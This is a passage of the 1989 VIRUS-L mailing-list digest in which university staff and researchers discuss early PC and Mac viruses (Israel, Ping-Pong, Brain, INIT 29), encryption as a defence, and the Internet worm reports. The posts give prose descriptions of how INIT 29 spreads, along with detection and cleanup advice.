  9712. protected against power outages, head crashes, and disasterous typos.
  9713.  
  9714.                         - Don Alvarez
  9715.  
  9716.      + ----------------------------------------------------------- +
  9717.      |   Don Alvarez               MIT Center For Space Research   |
  9718.      |   boomer@SPACE.MIT.EDU      77 Massachusetts Ave   37-618   |
  9719.      |   (617) 253-7457            Cambridge, MA 02139             |
  9720.      + ----------------------------------------------------------- +
  9721.  
  9722. ------------------------------
  9723.  
  9724. End of VIRUS-L Digest
  9725. *********************VIRUS-L Digest            Wednesday, 18 Jan 1989        Volume 2 : Issue 17
  9726.  
  9727. Today's Topics:
  9728. Re: Encrypted/Decrypted viruses
  9729. Re: Friday 13th / Israel Virus
  9730. Re: Meaning of "CYBER"
  9731. Computer Virus Industry Assc. ?
  9732. Reality Hackers
  9733. WordPerfect Access to Drive A (PC)
  9734. Internet worm report available in Gemany & Switzerland
  9735. Re: INIT 29 Virus (Mac)
  9736. More VIRUS seminars...
  9737. Virus created by software copying company?
  9738. encryption
  9739. Reply to Salzmann question about possible Word Perfect virus (PC)
  9740.  
  9741. ---------------------------------------------------------------------------
  9742.  
  9743. Date: Mon, 16 Jan 89 20:23:46 -0500 (EST)
  9744. From: Michael Francis Polis <mp3o+@andrew.cmu.edu>
  9745. Subject: Re: Encrypted/Decrypted viruses
  9746.  
  9747. Such an encryption system would only be useful if it were not
  9748. standard.  If it became standard, or at least widely distributed,
  9749. viruses would work their way around it by calling whatever interrupt
  9750. did the encryption on themselves before they became part of your
  9751. favorite program.  Even individual keys would not protect against
  9752. this.
  9753.  
  9754. ------------------------------
  9755.  
  9756. Date: 17 January 1989, 09:40:32 MEZ
  9757. From: Christoph Fischer   <RY15@DKAUNI11.BITNET>
  9758. Subject: Re: Friday 13th / Israel Virus
  9759.  
  9760. I am a consultant at the computing center of the University of
  9761. Karlsruhe West-Germany. We were asked to assist the people at the
  9762. University of Hohenheim West-Germany. They found a virus spreading in
  9763. their public PC-pool.  We identified the virus as the Israel type on
  9764. wednesday afternoon. The people at Hohenheim had just one day to go
  9765. through their PCs and remove the virus with the help of H&B EDVXs Anti
  9766. Virus software (it had some trouble and didn't restore all files to
  9767. their original function, but the author of the program will check if
  9768. the virus is a mutant and will update the software) The viruses
  9769. destructive action on friday was tested on one PC: it destroyed all
  9770. executable files on the first attempt to run them. They didn't
  9771. experience any low-level format (only possible on PC-XT controllers
  9772. and a few AT contollers) maybe there is another threshold for that
  9773. action or it is a pure rumor. The virus reappeared after friday since
  9774. the students brought executable files on their disks. Larry Lover
  9775. (well known game) was pinpointed as virus infected and a major source
  9776. of the trouble since everyone copied this sw.
  9777.  
  9778. Chris
  9779. (Christoph Fischer / University of Karlsruhe West-Germany / Computing Center )
  9780. ( D-7500 Karlsruhe 1 / Zirkel 2 / Rechenzentrum  / Tel. +721 608 2997 )
  9781. ( RY15 at DKAUNI11.BITNET )
  9782.  
  9783. ------------------------------
  9784.  
  9785. Date:         Tue, 17 Jan 89 09:19:51 EST
  9786. From:         Joe McMahon <XRJDM@SCFVM.BITNET>
  9787. Subject:      Re: Meaning of "CYBER"
  9788. To:           Virus Discussion List <VIRUS-L@LEHIIBM1>
  9789.  
  9790. CYBER comes from cybernetics, a word invented by Norbert Weiner. Its
  9791. root is from the Greek Cybernos, the steersman. Weiner's original
  9792. application of it was in self-controlling systems.
  9793.  
  9794. - --- Joe M.
  9795.  
  9796. ------------------------------
  9797.  
  9798. Date:         Tue, 17 Jan 89 09:46:53 EST
  9799. From:         "John P. McNeely" <JMCNEELY@UTCVM.BITNET>
  9800. Subject:      Computer Virus Industry Assc. ?
  9801.  
  9802.      Has anyone out there ever heard of the 'Computer Virus Industry
  9803. Association' ? If so, what functions does it perform? If you have any
  9804. information about the organization, I would appreciate a reply either
  9805. directly to me or to the list.
  9806.  
  9807. Thanks,
  9808.  
  9809. John P. McNeely
  9810. <JMCNEELY@UTCVM.BITNET>
  9811.  
  9812. UT-Chattanooga (No, where not the Vols.)
  9813.  
  9814. ------------------------------
  9815.  
  9816. Date:         Tue, 17 Jan 89 10:52:20 EST
  9817. From:         "Homer W. Smith" <CTM@CORNELLC.BITNET>
  9818. Subject:      Reality Hackers
  9819.  
  9820.      I have been flooded with requests concerning the article in
  9821. Reality Hackers on computer viri.  As I can not possibly xerox and
  9822. send a copy of it to every one of you, I herewith post the name and
  9823. address where you can get a copy for yourself.  It is on the news
  9824. stands, some of them at least.
  9825.  
  9826.      High Frontiers/Reality Hackers
  9827.      PO 40271
  9828.      Berkeley, CA 94704
  9829.      415 845-9018
  9830.  
  9831.      Winter issue number 6.
  9832.  
  9833.      'Cyber Terrorists/Viral Hitmen'
  9834.  
  9835.      For those of you who I have already promised to send a xerox,
  9836. they will soon be on their way.
  9837.  
  9838. ------------------------------
  9839.  
  9840. Date: Tue, 17 Jan 89 10:01 MDT
  9841. From: "Craig M." <SIERRA@usu.bitnet>
  9842. Subject: WordPerfect Access to Drive A (PC)
  9843.  
  9844. The vanilla version of WordPerfect (as it comes from the box) uses the
  9845. default directory/drive for temporary files (it creates several of
  9846. them: a printer queue, backup files, timed backup files, and a couple
  9847. of others).  If you are using a version of WP that has previously been
  9848. configured for use from a floppy drive but copied and executed from a
  9849. hard disk, these parameters will still be in the setup file (something
  9850. like {WP}WP.SET).  These setup parameters can be changed by running WP
  9851. with a /S switch from the DOS command line for version 4.2, or by
  9852. pressing SHIFT-F1 in WordPerfect for version 5.0.  In either case,
  9853. it's under the section of 'location of auxiliary files'.
  9854.  
  9855. Check these values to make sure someone hasn't changed the values.
  9856. Another way to ensure the setup values are not wrong is by recopying
  9857. the master (the ones with the original WP label) diskettes.
  9858.  
  9859. Another possibility I just thought of: If you boot from a floppy and
  9860. do not have a statement SET COMSPEC=C:COMMAND.COM, the computer will
  9861. look on the A (or whatever drive you booted from) for COMMAND.  If you
  9862. try shelling out to DOS from WordPerfect (CTRL-F1), the version of
  9863. COMMAND.COM that was on the boot drive will be loaded.
  9864.  
  9865. We have several thousand versions of WordPerfect (4.1/4.2/5.0) on our
  9866. campus, and have not had any trouble with viruses--at least that
  9867. haven't been openly publicized or reported.  Some kind of WP virus
  9868. certainly could easily wipe us out; or at least bring us to our knees.
  9869.  
  9870. ------------------------------
  9871.  
  9872. Date:    17 January 89, 16:46:39 +0100 (MEZ)
  9873. From:    Otto Stolz             +49 7531 88 2645     RZOTTO   at DKNKURZ1
  9874.          Rechenzentrum der Universit2t
  9875.          Postfach 5560
  9876.          D-7750 Konstanz 1
  9877. Subject: Internet worm report available in Gemany & Switzerland
  9878.  
  9879. Hi gang,
  9880.  
  9881. finally, I've got my Xmas present, directly from Bethlehem (it was
  9882. posted on 4th Jan by Air Mail: those reindeers seem not to be very
  9883. fast whith that sledge on their way across the ocean :-)
  9884.  
  9885. Thanks to Ken, I have now two reports on floppy disk:
  9886. 1. Eugene H. Spafford: "The Internet Worm Program: An Analysis",
  9887.    Purdue Technical Report CSD-TR-823, available as Postscript File
  9888.    (neatly printing!) and as pure ASCII file.
  9889. 2. Don Seeley: "A Tour of the Worm", Dept. Comp. Sci. Univ. Utah;
  9890.    this report is available with some SCRIPT-like markup and as a pure
  9891.    ASCII text, interspersed with many, many blank spaces. I didn't find
  9892.    a way to print or display this one neatly, or even legibly :-(
  9893.  
  9894. Eugene Spafford handles the topic (in 107 kByte) thoroughly and
  9895. clearly.  Large parts of the paper are comprehensable even to
  9896. non-Unix-connaisseurs like me; appendices present detailed
  9897. descriptions of worm-internals and fixes to Unix.  Also, a one-page
  9898. bibliography is given.
  9899.  
  9900. Don Seeley gives in (73 kByte) a nearly equally complete description
  9901. of the worms functioning, which can serve as a supplement to Stafford
  9902. (I'm somewhat biased here by the difficulty to read it from an badly
  9903. arranged screen).
  9904.  
  9905. Stafford grants permission to make copies of his work, without charge,
  9906. solely for the purposes of instruction and research.  I didn't see any
  9907. Copyright note in Seeley's report.
  9908.  
  9909. I volunteer as a sub-distributor of these two reports for the Federal
  9910. Republic and Switzerland, under the following conditions:
  9911. 1. Both reports on floppy disks:
  9912.    Send me one 5.25", 1.2 MByte disk
  9913.         or one 3.50", 0.7 MByte disk
  9914.         or two 5.25", 0.4 MByte disks
  9915.    formatted for MS-DOS (cf. postal address in the header of this note).
  9916.    Enclose a stamped (German or Swiss stamps acceptable), self-addressed
  9917.    envelope.
  9918.    I'll copy the 4 files to your disk(s) and post it in the envelope you
  9919.    provided.  I'll post envelops with Swiss stamps in Switzerland, others
  9920.    in Germany.  I'll add no stamps, no stable envelope, I'll make no
  9921.    corrections to the address.
  9922. 2. Stafford's report only, in print:
  9923.    Send me one stamped (allow for 204 g + weight of your envelope), self-
  9924.    addressed envelope and 4 DM or 3.50 sFr for printing costs.
  9925.    I'll print the report for you (worth 4.10 DM) on my private account
  9926.    and post it in the envelope provided, as above.
  9927.  
  9928. I hope everybody interested in the two reports will be able to agree
  9929. with this proviso, which is designed to save me a lot of unneccessary
  9930. work.
  9931.  
  9932. If anybody in Europe, but outside Germany and Switzerland, is still
  9933. interested in the reports, please drop me a note to my EARN/BITNET
  9934. address, and I'll try to make some suitable arrangement.  But be
  9935. prepared to act as a sub-distributor for your country, then!
  9936.  
  9937. Best wishes
  9938.             Otto
  9939.  
  9940. [Ed. Thanks Otto!  That second report, TOUR.N, was written in nroff, I
  9941. believe.  It also comes with a file called TOUR.CRT which was
  9942. formatted for CRT viewing.  Printing that file on a printer which
  9943. obeys backspaces and underlines will work just fine; that's what I
  9944. did.  Anyone more fluent in nroff than I (read: at all fluent in...)
  9945. might be able to format TOUR.N for another output device.  Thanks
  9946. again.]
  9947.  
  9948. ------------------------------
  9949.  
  9950. Date:         Tue, 17 Jan 89 14:08:39 EST
  9951. From:         Joe McMahon <XRJDM@SCFVM.BITNET>
  9952. Subject:      Re: INIT 29 Virus (Mac)
  9953. To:           Virus Discussion List <VIRUS-L@LEHIIBM1>
  9954.  
  9955. Can anyone give me further information on this virus? Is it the "hPAT"
  9956. variation of nVIR, or is it another virus altogether? I have seen
  9957. mention of articles in comp.sys.mac, but that's not available to me
  9958. here on BITNet.  Thanks for anything which you might find.
  9959.  
  9960. - --- Joe M.
  9961.  
  9962. ------------------------------
  9963.  
  9964. Date:    Tue, 17 Jan 89 15:47 CST
  9965. From:    Ken  De Cruyenaere <KDC@UOFMCC.BITNET> 204-474-8340
  9966. Subject: More VIRUS seminars...
  9967.  
  9968. MIS Training Institute announces:
  9969.               AN EMERGENCY BRIEFING ON
  9970.                 ON COMPUTER VIRUSES
  9971. UNDERSTANDING THE PROBLEM AND IMPLEMENTING THE SOLUTION
  9972. The material is 8 pages long but the key points are:
  9973.  Cost: $590
  9974.  dates/locations:
  9975.   February 28 Chicago
  9976.   March 1     Dallas
  9977.   March 7     NewYork
  9978.   March 8     Atlanta
  9979.   March 14    Washington D.C.
  9980.   March 16    San Francisco
  9981.  
  9982. Dr. Fred Cohen is the "briefing leader".
  9983. "Two special features:
  9984. 1. You will see demonstrations showing live computer viruses actually
  9985.    damage systems.
  9986. 2. As a participant you will receive diskettes containing over 20 programs
  9987.    for viral defense product lines that you can try on your own computer.
  9988.    Researched, compiled, and explained for you, the value of these sample
  9989.    evaluation copies alone far exceeed the cost of the Briefing."
  9990.  
  9991. To register: call Pamela Bissett at 508-879-7999
  9992. MIS Training Institute, 498 Concord Street, Framingham, MA 01701
  9993. - ---------------------------------------------------------------------
  9994. Ken De Cruyenaere - Computer Security Coordinator
  9995. Computer Services - University of Manitoba - Winnipeg, Manitoba, Canada
  9996. Bitnet: KDC@CCM.UManitoba.CA               (204)474-8340
  9997.  
  9998. ------------------------------
  9999.  
  10000. Date:         Tue, 17 Jan 89 20:44:22 EDT
  10001. From:         <SSAT@PACEVM.BITNET>
  10002. Subject:      Virus created by software copying company?
  10003.  
  10004. It seems from reading the last several digests that a certain company
  10005. who produces Word Processing software, has yet another virus to
  10006. contend with?
  10007.  
  10008. In all fairness, since the company does not (I think) produce the
  10009. disks they sell perhaps they should look at the company who does their
  10010. production runs?
  10011.  
  10012. I could easily see a virus sitting in a duplicator passing itself on
  10013. to each disk that runs through the duplicator.
  10014.  
  10015. [Ed. Don't mass-copiers essentially do a sector-for-sector diskcopy
  10016. from an original?  Does anyone have any more info on this?]
  10017.  
  10018. ------------------------------
  10019.  
  10020. Date:     Tue, 17 Jan 89 17:05:58 EST
  10021. From:     Jefferson Ogata (me!) <OGATA@UMDD.BITNET>
  10022. Subject:  encryption
  10023.  
  10024. There is a bit of discussion on the subject of program encryption for
  10025. virus prevention in back issues of VIRUS-L (I think maybe around July
  10026. or August of last year).  The two major glaring flaws in the idea are
  10027. that it takes time to decrypt the programs before you run them, and
  10028. that the encryption/decryption program itself could become infected,
  10029. since it clearly cannot be stored in an encrypted format.  Also,
  10030. program encryption cannot easily protect the operating system, since
  10031. that also cannot be encrypted, so boot block viruses and the like are
  10032. still pretty pervasive.  The second problem is not easily dealt with,
  10033. but here is a bit of elaboration on the first:
  10034.  
  10035. If a virus is out to beat an encryption scheme, then it probably
  10036. doesn't make much difference which one is being used; even if some-
  10037. thing pretty hairy like DES encryption is being used, the virus can
  10038. intercept keyboard input and wait for the key to be entered.  Any
  10039. encryption scheme can be circumvented fairly easily by a virus
  10040. designed with that in mind.  However, using encryption of any kind
  10041. would provide excellent protection from most other types of virus.
  10042. Since the actual algorithm doesn't matter as much as the encryption
  10043. itself, a very simple algorithm would achieve largely the same results
  10044. as a complicated one.  Therefore, the problem of time consumption can
  10045. be fairly eradicated by using a fast, simple algorithm (e.g. a single
  10046. cipher).
  10047.  
  10048. Keep in mind that even a simple virus like Brain will spread regard-
  10049. less of program encryption, because it attaches to code that could
  10050. not be stored encrypted.
  10051.  
  10052. - - Jeff Ogata
  10053.  
  10054. ------------------------------
  10055.  
  10056. Date:    Tue, 17 Jan 89 16:04 PST
  10057. From:    Larry Cobb 63898 <ILZ1LFC@OAC.UCLA.EDU>
  10058. Subject: Reply to Salzmann question about possible Word Perfect virus (PC)
  10059.  
  10060. A reply to the WP part of the following message:
  10061.  
  10062. >Date:     Mon, 16 Jan 89 16:33:29 IST
  10063. >From:     "Eldad Salzmann (+972)-3-494520" <ELDAD@TAUNIVM.BITNET>
  10064. >Subject:  Any connection between the ping-pong virus and WordPerfect? (PC)
  10065. >...  Was WordPerfect infected by the omnipotent virus?
  10066. >...  A WordPerfect which was till then working quite smoothly from
  10067. >the HD, sud- denly began to look at drive A: for its WP.exe file, ...
  10068.  
  10069. I've had similar problems occasionally with Word Perfect 4.2.  I've
  10070. not had any such with WP 5.0, but then I've been using WP 5.0 only a
  10071. while.  Those problems were traced to various possible causes, *none*
  10072. of them viruses.
  10073.  
  10074. Yes, WP sets up working and backup files for itself, usually in the
  10075. default directory unless you specify otherwise when you do WP setup.
  10076. You could have lost or damaged your setup file (named {WP}SYS.FIL ).
  10077. I think I've established that too little RAM also allows WP to start
  10078. but soon do silly things.  Have you added drivers, memory resident
  10079. software, or anything else that may reduce RAM?  Lastly, WP sometimes
  10080. looses control of itself when I ask it to load document files from
  10081. another word processor or files it created but were munched by a
  10082. hapless user.  This latter possibility is corrected by rebooting and
  10083. not loading those files; the first two would stay with you until
  10084. they're corrected.
  10085.  
  10086. Larry Cobb, UCLA School of Nursing, ILZ1LFC@UCLAMVS or ILZ1LFC@OAC.UCLA.EDU
  10087.             213-206-3898
  10088.  
  10089. ------------------------------
  10090.  
  10091. End of VIRUS-L Digest
  10092. *********************VIRUS-L Digest            Wednesday, 18 Jan 1989        Volume 2 : Issue 18
  10093.  
  10094. Today's Topics:
  10095. Re: The Ping-Pong virus (PC)
  10096. Re: Boot sequence (PC); Discretion
  10097. Init 29 virus (Mac)
  10098. Macintosh INIT 29 virus - brief description (Mac)
  10099. suspicious file
  10100. Worm paper in nroff (Internet)
  10101.  
  10102. ---------------------------------------------------------------------------
  10103.  
  10104. Date:        Tue,  17 Jan 89 15:06:39 +0200
  10105. From:        Y. Radai <RADAI1@HBUNOS.BITNET>
  10106. Subject:     Re: The Ping-Pong virus (PC)
  10107.  
  10108.   Eldad Salzmann asked about the Ping-Pong virus.  It is a virus
  10109. which first appeared in Israel about three months ago, and which got
  10110. its name because of a bouncing point which appears on the screen.
  10111. Like the Brain virus, it resides in the boot sector of disks, in bad
  10112. sectors, and in high RAM.  (Since I haven't heard of any reports of
  10113. its appearence anywhere else, I presume that it originated in Israel,
  10114. probably in the Tel Aviv area.)
  10115.   Among the points in which it differs from the Brain virus: (1) It
  10116. infects hard disks, not only 5 1/4-inch floppies.  (2) It marks only
  10117. two sectors as bad.  (3) It grabs only 2K of high RAM.  (4) To the
  10118. best of my knowledge, it does not cause any damage to files or to the
  10119. FAT.  In particular, the bad sectors seem to always be chosen from
  10120. unused clusters.
  10121.   As to Eldad's question about the possibility of a connection between
  10122. the Ping-Pong virus and his WordPerfect problem, I strongly doubt that
  10123. there is any.
  10124.   No, there is no panacea against viruses.  However, the same program
  10125. UNVIRUS which was originally written to eradicate the "sUMsDos"
  10126. (Friday-the-13th) Israeli virus, and was later extended to three other
  10127. Israeli viruses, has also been extended to eradicate the Ping-Pong
  10128. virus, both from the disk and from RAM.  (The author of all versions
  10129. of UNVIRUS is Yuval Rakavy.)
  10130.  
  10131.   I said above that points (1)-(4) were supposed to be in contrast to
  10132. the Brain virus, but actually I'm not at all sure what the latter does
  10133. with respect to point (4).  I have read (A) that it isn't at all des-
  10134. tructive; (B) that it "has been hacked ... into a very malignant form
  10135. which can infect hard disks and which destroys FAT entries, deletes
  10136. files, and performs other malicious activities" (quoted from the
  10137. InterPath document); (C) that is is destructive only to the extent
  10138. that it may copy its code to sectors which may belong to existing
  10139. files.  Obviously, each of these descriptions may be correct for a
  10140. different strain of the virus, although sometimes the reports contra-
  10141. dict themselves even when talking about the *same* variant (e.g. with
  10142. respect to that which hit the Univ. of Miami).  In any case, can any-
  10143. one verify from *actual first-hand experience* that there is a version
  10144. of Brain which is destructive in sense (B)?
  10145.  
  10146.                                            Y. Radai
  10147.                                            Hebrew Univ. of Jerusalem
  10148.  
  10149. ------------------------------
  10150.  
  10151. Date:        Tue,  17 Jan 89 17:10:21 +0200
  10152. From:        Y. Radai <RADAI1@HBUNOS.BITNET>
  10153. Subject:     Re: Boot sequence (PC); Discretion
  10154.  
  10155. Concerning the boot process on the PC, Dimitri Vulis writes (V2#10):
  10156. >                                  Certainly, one can mess around with
  10157. >a disk and create one that won't boot, because IBMBIO.SYS is not at
  10158. >the beginnig. This would require some (a little) conscious effort and
  10159. >cannot easily be done with just FORMAT/S or SYS. I was describing a
  10160. >successful boot, in which the file is read into memory.
  10161.   (1) I wasn't assuming a disk which wouldn't boot, since IBMBIO.SYS
  10162. does not have to be at the beginning of the disk in order for it to
  10163. boot.  If another program has been placed there (e.g. by a virus), it
  10164. would be executed first, but it could terminate with a transfer of
  10165. control to IBMBIO (which has been relocated elsewhere) in order for a
  10166. successful boot to take place.  (2) Even if Dimitri intended to des-
  10167. cribe only normal boots, it is more accurate to say that the boot rou-
  10168. tine loads certain sectors than that it loads certain files, and my
  10169. correction was intended to convert his description from one which is
  10170. correct only in the case of normal disks into one which would be accu-
  10171. rate also for altered disks (assuming, of course, that the boot rou-
  10172. tine itself has not been altered).  (3) Although my correction may
  10173. seem trivial to some readers, I have reasons for considering it to be
  10174. quite significant for certain purposes.
  10175.  
  10176.   Another (not very important) point:
  10177. >     if the disk has IBMBIO.COM and IBMDOS.COM as the first files in
  10178. >the directory, (and finding that takes room too) and if they are
  10179. >hidden/system, then the code assumes that the disk is OK ....
  10180.   I once removed the hidden and system attributes from IBMBIO.COM and
  10181. IBMDOS.COM on one of my diskettes, yet I was still able to boot from
  10182. it.
  10183.  
  10184.   In his reply concerning the false-sense-of-security issue which I
  10185. raised, Dimitri has clarified what he meant by discretion.  Among
  10186. other things he writes:
  10187. > I don't download software from BBS's anymore (too bad) ....
  10188.   Yes, it certainly is too bad.  I continue to download software
  10189. (mainly from the SIMTEL20 archives).  One reason that I feel relative-
  10190. ly safe doing so is that I try out all new software on a separate com-
  10191. puter (I realize, of course, that this facility is not available to
  10192. everyone), and I don't transfer the new software to the hard disk of
  10193. my ordinary computer until several weeks (sometimes even months) have
  10194. elapsed, during which time I check for suspicious activity by means of
  10195. the programs I mentioned earlier: FSP, PROTECT, and (most important)
  10196. the checksum program in order to see if anything on the disk is get-
  10197. ting altered which shouldn't.  (I use the same programs on my ordinary
  10198. computer too, of course.)  Also, I simulate dates in the future just
  10199. in case the software contains a time bomb with a long delay.  (Yes, I
  10200. know, even then I can't be *completely* sure, but I don't mind taking
  10201. the risk.)
  10202.   Secondly, Dimitri has mentioned ads which claim 100% protection from
  10203. viruses, and he has discussed the exploitation by crooks and gonefs of
  10204. "dumb ignorant people", "complete idiots" and "very stupid and igno-
  10205. rant individuals".  However, I don't find that he has given a direct
  10206. answer to my main question: Why can't we use *both* anti-viral soft-
  10207. ware *and* discretion?
  10208.                                            Y. Radai
  10209.                                            Hebrew Univ. of Jerusalem
  10210.  
  10211. ------------------------------
  10212.  
  10213. Date: Wed, 18 Jan 89 11:39:10
  10214. Resent-From: XRJDM@SCFVM.Bitnet
  10215. From: Confusion's Drummer <R746LL12@CMCCVB.BITNET>
  10216. Subject: Init 29 virus (Mac)
  10217.  
  10218. Here's an extract describing the Mac INIT 29 virus from Laura Lemay
  10219. at Carnegie-Mellon University.
  10220.  
  10221.  --- Joe M.
  10222.  
  10223.  
  10224. 1.  To answer your question on Virus-L...init 29 is NOT hpat.  Hpat is
  10225. a near-clone of nVIR B (the 422-byte, code 256 version that says
  10226. "don't panic"), except the code is 255 instead of 256, and I think the
  10227. byte-size has changed.  Rumors are still flying. {Several new repair
  10228. programs are available, but have not yet been put out on the SCFVM
  10229. server. They will be announced and sent to the Simtel-20 and Info-Mac
  10230. archives when they are installed.}
  10231.  
  10232. Init 29 is an entirely NEW virus.  It is tiny (1/2 k!)), and the only
  10233. sign it exists is an INIT (29, wonder of wonders) that starts popping
  10234. up in everything.  SO far, the only side effects I've heard of is that
  10235. it gives "disk needs minor repairs" errors while trying to mount TOPS
  10236. volumes.
  10237.  
  10238. The really evil thing about INIT 29 is that it doesn't need a program
  10239. to be run in order to spread.  It starts infecting the moment a disk
  10240. is inserted in a drive!  In this way, an idle hard disk can be
  10241. infected completely in a short amount of time.
  10242.  
  10243. Oops - I just found another note about INIT 29....it adds CODE
  10244. resources to applications, and INITs to everything else.  Both are 712
  10245. bytes.  I don't know what number the code is -- they didn't mention it
  10246. in the note.  Protected code 0's foil the virus (as they do in nVIR
  10247. and scores).
  10248.  
  10249. VirusDetective (tm) and RWatcher can be modified to look for it
  10250. (search on INIT 29 and code size 712). New versions of Vaccine,
  10251. Interferon, and Virus RX either have appeared or will appear soon.
  10252. {New Vaccine is out; haven't seen a new Interferon yet; new Virus RX
  10253. is out and available at SCFVM.}
  10254.  
  10255. I hope I haven't sounded too confused -- there are still a lot of
  10256. rumors flying around.  All my info comes from a friend at apple who
  10257. pulled it off of mac link.
  10258.  
  10259. If you want to post this info on virus-L, please do.  For some reason,
  10260. I don't have access to the group or to the moderator.  Sigh. {Any
  10261. ideas, Ken?}
  10262.  
  10263. Laura Lemay
  10264. R746LL12@CMCCVB.BITNET
  10265. Carnegie-Mellon University
  10266.  
  10267. [Ed. She does now...welcome to VIRUS-L, Laura.]
  10268.  
  10269. ------------------------------
  10270.  
  10271. Date: Wed, 18 Jan 89 14:05:52 -0500
  10272. From: Joel B Levin <levin@BBN.COM>
  10273. Subject: Macintosh INIT 29 virus - brief description (Mac)
  10274.  
  10275. Here is a brief overview of the recently seen INIT 29 virus.  I have
  10276. disassembled it and this represents a summary of what I have discovered.
  10277.  
  10278. * PLEASE NOTE: Where I describe what this virus does or does not do, keep in
  10279. * mind the phrase "AS FAR AS I KNOW."  I have looked at all the code in the
  10280. * virus, but I'll not guarantee that I have seen everything that there is to
  10281. * see in it.
  10282.  
  10283. First, the good news: it appears to have almost no harmful side
  10284. effects (files destroyed, beeping, and the like).  If it can't do
  10285. something it generally does nothing.  All its code is devoted to the
  10286. task of propagating itself.
  10287.  
  10288. So the bad news: it is very good at propagating; I would agree with
  10289. those who term INIT 29 virulent.
  10290.  
  10291. INIT 29 is a single 712 byte resource which installs itself into
  10292. non-applications as (you guessed it) INIT 29, and into applications as
  10293. a CODE resource.  There are no ancillary resources such as those used
  10294. by nVIR (and Hpat), so it is somewhat less noticeable using ResEdit,
  10295. say.
  10296.  
  10297. The INIT works by patching a trap, OpenResFile.  (If it detects that
  10298. another copy of itself has already patched OpenResFile, it does
  10299. nothing.)
  10300.  
  10301. The patch to OpenResFile is a tail patch; i.e., it calls the routine
  10302. at the address previously dispatched to by OpenResFile, then does its
  10303. dirty work on the resource file just opened.  This, basically, is to
  10304. copy itself into that resource file if it was not previously infected.
  10305. If the file has no CODE resources, it copies itself in as INIT 29.  If
  10306. the file does have CODE resources, it writes itself into the file as a
  10307. new CODE resource with the previously lowest unused resource number.
  10308. It patches the jump table in CODE 0 so that it is called before the
  10309. application proper is started.
  10310.  
  10311. When an infected application runs, it examines the system file for
  10312. INIT 29.  If the system is infected, it just starts the application
  10313. proper; if not, it first adds itself as INIT 29 to the system file.
  10314.  
  10315. The only overtly destructive thing this virus does is to remove and replace
  10316. any legitimate INIT 29 which may have been present in the file before the
  10317. infection attempt.
  10318.  
  10319. Because it patches the trap that it does, any resource file which is
  10320. opened once this INIT has run at boot time will become infected: your
  10321. Desktop file will have a copy of the INIT; all your INIT files may
  10322. have it; your EDIT text files will have it.  Just examining a resource
  10323. fork with ResEdit is sufficient to add it, either as the INIT, or
  10324. patching in the new CODE.
  10325.  
  10326. The VirusDetective DA can detect it; Apple's Virus Rx 1.4a1 appears to
  10327. flag it (though it doesn't say why it thinks a file is bad).  Other
  10328. virus programs may or may not catch it, and I don't know if any can
  10329. repair it.  Removing the INIT 29 resource should be safe; however, DO
  10330. NOT try to repair applications by removing the offending CODE
  10331. resource, as there will still be a patched jump table entry pointing
  10332. to that resource.  I do not know at this time if Vaccine, RWatcher, or
  10333. any of the other infection attempt detectors will catch this.
  10334.  
  10335. ------------------------------
  10336.  
  10337. Date:         Mon, 16 Jan 89 11:27:42 EDT
  10338. From:         "W. K. (Bill) Gorman" <34AEJ7D@CMUVM.BITNET>
  10339. Subject:      suspicious file
  10340.  
  10341. I have a user who has a suspicious file on the disk. It has a filename
  10342. consisting of what looks like random alphanumeric characters, no
  10343. extension, and shows a size of zero in the directory. Further, it
  10344. shows up on a normal DIR listing, but cannot be deleted by either DOS,
  10345. NORTON or a couple of other things. NORTON thinks, judging from the
  10346. first character in the fileneme, that it is a deleted file... but it
  10347. still shows up on the normal DOS "DIR" listing. The user says there
  10348. were a bunch of files out there like this one, but they were all
  10349. deleted except this one.
  10350.  
  10351. I am wondering if this might be a viral footprint?
  10352.  
  10353. .............................................................................
  10354. |W. K. "Bill" Gorman                 "Do             Foust Hall # 5         |
  10355. |PROFS System Administrator        SOMETHING,        Computer Services      |
  10356. |Central Michigan University      even if it's       Mt. Pleasant, MI 48858 |
  10357. |34AEJ7D@CMUVM.BITNET                wrong!"         (517) 774-3183         |
  10358. |_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_|
  10359. |Disclaimer: These opinions are guaranteed against defects in materials and |
  10360. |workmanship for a period not to exceed transmission time.                  |
  10361. |...........................................................................|
  10362.  
  10363. ------------------------------
  10364.  
  10365. Date: 18 January 89, 14:12:44 EST
  10366. From: Jeffery K. Bacon     <BACON@MTUS5.BITNET>
  10367. Subject: Worm paper in nroff (Internet)
  10368.  
  10369. Quick note on the "Tour of the Worm" file for Otto (and others):
  10370.  
  10371. In the nroff source, there IS a copyright note. However, considering the
  10372. thing was put up for anon ftp...
  10373.  
  10374. I'm sending Otto a reformatted version of the file...
  10375.  
  10376. - -JB
  10377.  
  10378. [Ed. Thanks Jeff.  Having never really looked at the nroff source (I
  10379. only printed the .CRT file), I never noticed the copyright notice.  I
  10380. just looked at it now, however, and it does say "Copyright 1988 by
  10381. Donn Seeley, all rights reserved".  Anyone who wishes to use this
  10382. report (a very informative one, by the way) should get permission from
  10383. Mr. Seeley.]
  10384.  
  10385. ------------------------------
  10386.  
  10387. End of VIRUS-L Digest
  10388. *********************VIRUS-L Digest              Friday, 20 Jan 1989         Volume 2 : Issue 19
  10389.  
  10390. Today's Topics:
  10391. Re: Computer Virus Industry Association?
  10392. Friday 13th virus in UK
  10393. PDP Virus
  10394.  
  10395. ---------------------------------------------------------------------------
  10396.  
  10397. Date:     Thu, 19 Jan 89 14:58 GMT
  10398. From:     Danny Schwendener <SEKRETARIAT@CZHETH5A>
  10399. Subject:  Re: Computer Virus Industry Association?
  10400.  
  10401. You might check last year's Risks digests. The association was
  10402. mentioned there, and not in a very good light.
  10403.  
  10404. It seems that the owner of a software company specialized in
  10405. virus-detecting tools created this association with the sole purpose
  10406. of publicity. He claimed that its members held over 90% of the
  10407. computer vaccine market, but was unable to sustain his claim when
  10408. asked by a competitor (who was - of course - not member of the
  10409. association).
  10410.  
  10411. Danny Schwendener <SEKRETARIAT@CZHETH5A.BITNET>
  10412.  
  10413. ------------------------------
  10414.  
  10415. Date: Fri, 20 Jan 89 00:10:38 est
  10416. From: ubu!luken@lehi3b15.csee.lehigh.edu
  10417. Subject: Friday 13th virus in UK
  10418.  
  10419. I've heard various reports now on the purported Friday the 13th virus
  10420. hitting the UK last week on Friday the 13th.  Now I've been told that
  10421. the Philadelphia Inquirer, a reputable newspaper on the East Coast,
  10422. had an article on it in their Saturday (the 14th) newspaper.  I didn't
  10423. see the article, however.  Does anyone have any more information on
